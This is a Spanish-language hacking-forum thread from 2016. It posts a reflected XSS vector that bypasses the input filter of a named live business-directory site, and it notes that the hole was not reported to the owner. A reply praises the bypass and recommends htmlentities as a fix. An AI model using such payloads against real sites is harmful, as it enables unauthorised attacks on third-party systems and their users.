[XSS] www.iglobal.co

Iniciado por rreedd, Diciembre 18, 2016, 08:12:15 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Diciembre 18, 2016, 08:12:15 PM
Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción del sitio : "iGlobal es un directorio online de negocios y profesionales de 60 paises del mundo" (iglobal.co)

   [XSS] Inyección en URL .



  Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  Vector :  "+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1>
  Exploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  Reportado : NO
  Autor : RREEDD
Diciembre 19, 2016, 12:40:57 AM #1 Ultima modificación: Diciembre 19, 2016, 12:42:46 AM por GGZ
Jajaja, buen XSS, salteaste el filtro que tenía.

Hablando de esos filtros, ¿no es mejor directamente usar htmlentities?, que todo ese filtro que al final siempre se lo termina salteando la mayoría de veces.

Ahora te queda saltear el filtro de Google Chrome

Saludos!
Imprimir
Ir Arriba Páginas1
Acciones del Usuario